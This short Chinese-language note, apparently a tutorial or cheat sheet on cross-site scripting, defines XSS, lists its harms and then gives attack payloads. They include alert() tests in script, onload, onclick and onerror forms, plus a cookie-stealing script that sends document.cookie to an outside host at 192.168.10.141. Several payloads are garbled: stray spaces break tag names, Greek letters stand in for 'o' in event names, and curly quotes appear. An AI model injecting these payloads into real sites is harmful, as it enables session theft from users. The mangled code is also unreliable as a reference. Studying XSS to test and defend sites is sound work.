XSS漏洞
XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
XSS攻击的危害包括
1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商业价值的资料
4、非法转账
5、强制发送电子邮件
6、网站挂马
7、控制受害者机器向其它网站发起攻击
xss漏洞命令:
< script>alert(‘xss’)</s cript>
< body οnlοad=alert(‘xss2’) >
<a href=’’ οnclick=alert(‘xss3’)>click1
<img src=http://192.168.10.128/a.jpg οnerrοr=alert(‘xss4’)>
获取cookie
1.< sc ript>alert(document.cookie)</ script>
2.< script>new Image().src=“http://192.168.10.141/a.php?output=”+document.cookie;</sc ript>
|